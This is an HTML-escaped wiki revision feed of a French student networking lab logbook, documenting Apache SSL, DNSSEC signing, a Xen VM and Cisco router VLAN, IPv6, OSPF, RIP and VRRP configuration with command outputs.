                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2modssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35434</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35434"/>
				<updated>2016-11-28T10:08:37Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Securisation de site par SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM/RAID5&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 3e semaine====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e semaine====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
